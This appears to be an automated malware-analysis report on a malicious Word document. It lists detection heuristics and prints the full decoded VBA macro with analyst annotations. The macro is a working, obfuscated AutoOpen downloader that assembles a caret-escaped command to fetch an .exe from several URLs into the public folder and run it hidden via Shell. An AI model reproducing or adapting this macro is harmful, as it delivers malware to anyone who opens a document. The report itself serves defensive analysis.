Malware Insights
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic firing for Shell() indicates that the macro attempts to execute external commands. The reconstructed string from the VBA script, 'd /V/C "^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yr^t^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^'^+^I^F^t^$+^'^\^'^+ci^l^b^u^p^:vn^e^$^=^F^M^K^$ ;^'^2^9^9^'^ =^ I^F^t$^;)^'^@^'(^t^i^l^p^S^.'^9^UR^s^FR^I5^y^S/^moc.^', appears to be constructing a command to download and execute a second-stage payload. This is consistent with a spearphishing attachment attack.
Heuristics 6
-
ClamAV: Doc.Malware.00536d-6703105-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Malware.00536d-6703105-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELL — Shell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPEN — AutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC — OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3963 bytes |
SHA-256: 284e782ef74c3b3b11d28ce9a9f9b7a9768ae2c6e432cdd6e459a11dad284c1c
Preview script — First 1,000 lines of the extracted script
' Module header as written out by the VBA exporter. VB_Base names "1Normal.ThisDocument",
' so this appears to be the document's ThisDocument module (the one holding AutoOpen below).
Attribute VB_Name = "HswWLUQCWVZf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point (OLE_VBA_AUTOOPEN heuristic): per the report summary, AutoOpen
' runs when the document is opened. Every If/End If block in this procedure tests names that
' are never assigned anywhere in this listing and stores a short string in a variable that is
' never read again, so they read as filler around the single call on the JhzvaaqadHXE line.
Sub AutoOpen()
' Filler: condition operands and assigned targets are unused elsewhere in the listing.
If ClRuVP Eqv 6 Then
BmIkY = "mqow"
End If
If wbbjH Xor YZrpk Then
IsADiC = "MXqM"
End If
If azijw And YsiGz Then
MzRzDQ = "H"
End If
If sSLpZl <= MSFwM Then
aKNOX = "anNYOKzBk"
End If
If DHskw Or 5 Then
hiFPH = "hH"
End If
If EYYcIq And 13 Then
bKvIwP = "Y"
End If
' The only operative statement: concatenate the three string-builder functions (GjznOEH,
' MNuimBbhiT, iPuBlGJwWX) with two KeyString() results and several names that are not
' defined in this listing, then pass the result to JhzvaaqadHXE, which hands it to Shell.
' KeyString is not defined here (presumably Word's Application.KeyString -- confirm); the
' undefined names presumably contribute empty values to the `+` concatenation -- TODO confirm
' by tracing in a sandbox rather than assuming.
JhzvaaqadHXE (KeyString(luuhbhFO + NGljtnZ + 15 + 4 + 48 + hIRww + Jzcmi) + ZwIrj + JLiHvinQ + KeyString(OBFNh + vbWXHmkA + 17 + 5 + 55 + Lkkvq + YzmpDb) + GjznOEH + MNuimBbhiT + iPuBlGJwWX + JJKXiv + RHfSsNV)
' Filler, as above.
If iSIvfB Xor lWfpjF Then
tFsowZ = "h"
End If
If pCZRE <= ccwQjz Then
jOvpoO = "mwl"
End If
If EJnSk <= zbFGdb Then
jtCNi = "RvIJaDjPTGQs"
End If
If EtIKLQ Eqv 13 Then
iuwiZ = "QcdqnDJCbR"
End If
End Sub
' Start of a second exported module; it holds the three string-builder functions used by AutoOpen.
Attribute VB_Name = "HATpKNZjVsdl"
' Builds the leading segment of the command string (compare the reconstructed string in the
' Malware Insights section): six local fragments, each itself split with `+`, joined in order.
' The fragments are dense with `^` carets, which cmd.exe treats as an escape character and
' strips, so the literal text seen here is not what the shell ultimately parses. Takes no
' arguments; returns the joined string.
Function GjznOEH()
zjKCKiMiU = "d /V/C" + """" + "^s^e^t ^B^J^" + "1=^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^"
czJNL = " ^}^}{^hc^t" + "^ac}^;^k^a^er^b^;^F" + "^M^K^$^ ^m^e^" + "t^I-^e^k^ovn^I^"
sskLwGilf = ";)^F^M^K^$^ ,E^A" + "^H^$(^e^l^i^F^" + "d^a^o^ln^w^o^" + "D^.^qn^K^$^{^yr" + "t^{)h^b^i^$^"
pmfSAziCsrR = " n^i^ ^E^A^H^$(^hc^a" + "^er^of^;^'^e^x^e" + "^.^'^+^I^F^t^$+^'^" + "\^'^+ci^l^b^u^p^" + ":vn^e^$^=^F^M^K^$"
VnFrvQVwm = ";^'^2^9^9^'^ " + "^=^ I^F^t^" + "$^;)^'^@^'(^"
EEzaDnVfPpU = "t^i^l^p^S^.'^" + "9^UR^s^FR^I" + "5^y^S/^moc.^"
' Return value is fixed here; the two If blocks after it only assign variables that are never read.
GjznOEH = zjKCKiMiU + czJNL + sskLwGilf + pmfSAziCsrR + VnFrvQVwm + EEzaDnVfPpU
If FTsfQl <= 12 Then
mraSw = "f"
End If
If mbvWn Or 16 Then
XXzRj = "fBn"
End If
End Function
' Builds the middle segment of the command string from five caret-escaped fragments, with
' filler If blocks (undeclared operands, unused targets) interleaved between the real
' assignments. Several fragments carry `@`-separated runs of `//:^p^t^t^h`-style text, which
' is consistent with the report's assessment that a download command is being assembled;
' the exact strings are not decoded in this annotation. Takes no arguments; returns the
' joined string.
Function MNuimBbhiT()
khbqAZTBsd = "w^o^lra^mna^i^t^s" + "^ir^k//:^p^t^t" + "^h^@R^6^d^1^Yc^x^K/" + "cc^.^tn^ec^s^er^" + "o^u^l^f//^:p" + "^t^t^h^@^P^2^uS"
' Filler, as in AutoOpen.
If vhEZzm <> YUSwf Then
wfDwr = "j"
End If
If jptZG Xor oiYklS Then
PRiuo = "tlWq"
End If
If LATFq And 7 Then
PaNwTo = "GjI"
End If
If RuAzTw = qipoio Then
QZWDGr = "VIuEzMUnZ"
End If
djzPjTOihW = "^Bv^Tc^1/r^b" + "^.^m^oc^.v^e^d" + "n^o^i^t^o^m//^"
If CSZVO Eqv UTAQZm Then
JdYlkf = "k"
End If
iRQlUFuQCn = ":^p^t^t^h^@^z^q^F" + "v^s^q^Oc^a^B/" + "^m^oc^.^a^dn^os^" + "i^d^a^m//^:" + "^p^t^t^h^@XR^" + "l^A^f^B^I/^m^oc.^"
If jvBool = zWnOVM Then
CzHDmU = "FhhcJ"
End If
If GsUmRC = WzOmY Then
EHWlXu = "iI"
End If
uXLVQfVNzA = "i^j^ol^o^y" + "i^b^or^k^i^m^a" + "d^ig//^:^p"
If iWBRiO = 5 Then
LfUTq = "iQz"
End If
If pEwWf <> VBUhN Then
nBDpmK = "V"
End If
If hwmWYk And DdsqwN Then
MrabUO = "GhICt"
End If
aRICL = "^t^th^'^=^h^b^i^$" + "^;^tn^ei^lC^b^e^W^" + ".^t^eN^ ^tc^e^j^b^o" + "^-^wen^=^q" + "n^K^$^ ^l^l^e"
' Return value: the five real fragments in source order.
MNuimBbhiT = khbqAZTBsd + djzPjTOihW + iRQlUFuQCn + uXLVQfVNzA + aRICL
' Filler after the return value is set.
If iTfUm Xor ITEVpD Then
jSiDj = "VFnWloTfM"
End If
If VYmdY < zLIzRh Then
lbVjHb = "pIoiSF"
End If
If LSMkh > 1 Then
SwurcI = "LR"
End If
End Function
' Builds the trailing segment of the command string: two caret-escaped fragments ending in
' the closing double quote that pairs with the one opened in GjznOEH. Once carets are removed
' the text reads as a `for /L %F in (380,-1,0)` loop appending `!BJ1:~%F,1!` to `LyG` one
' character at a time while counting down, followed by a `call` of `%LyG:~5%` -- i.e. the
' BJ1 variable set in the GjznOEH fragment appears to be re-emitted in reverse before it is
' run. TODO confirm by executing in an isolated sandbox rather than from the literals alone.
' Takes no arguments; returns the joined string.
Function iPuBlGJwWX()
rZrTMGHqXh = "^h^sr^e^w^o^p" + "&&^f^or /^L %^F " + "^in (3^8^0" + "^,^-^1^,^0)^" + "d^o ^s^e^t" + " ^L^y^G=!^L^y^G!!^B"
PicHAcPtZ = "^J^1:~%^F,1!&&^i^" + "f %^F ^l^s^" + "s ^1 c^a^l^l %^" + "L^y^G:^~^5%" + """"
iPuBlGJwWX = rZrTMGHqXh + PicHAcPtZ
' Filler after the return value is set.
If qKblG > Jqwtf Then
DvjwJ = "rbzdL"
End If
End Function
' Start of a third exported module; it holds only the Shell wrapper called from AutoOpen.
Attribute VB_Name = "SHUhZOwXOw"
' Execution sink (OLE_VBA_SHELL heuristic): passes the command string assembled by AutoOpen
' straight to Shell. Declared as a Function but never assigns a return value, so it behaves
' as a procedure. The If blocks are filler of the same shape as elsewhere in the listing.
'   YKIBwVS - the full command line built by the caller.
Function JhzvaaqadHXE(YKIBwVS As String)
' 16425839 - 16425839 evaluates to 0; used below as Shell's window-style argument
' (0 is vbHide, i.e. the spawned process window is not shown).
Const AqorwRr = 16425839 - 16425839
If qiUMt <= ScuMw Then
ADPZd = "a"
End If
If BbdUo Xor MqPja Then
DUPia = "foiRI"
End If
If Wtjpn And UYjjTf Then
wjrdVd = "kII"
End If
' `Shell#` is the Shell function with a type-declaration suffix character appended;
' the first argument is the command line, the second the window style from above.
Shell# YKIBwVS, AqorwRr
If mjNkOM <= TEJcU Then
ardwDG = "GJjuf"
End If
If MQOEO Xor EEUkoX Then
XwENc = "aEFjiA"
End If
If UHjjE >= kRUHzZ Then
rDuul = "tz"
End If
End Function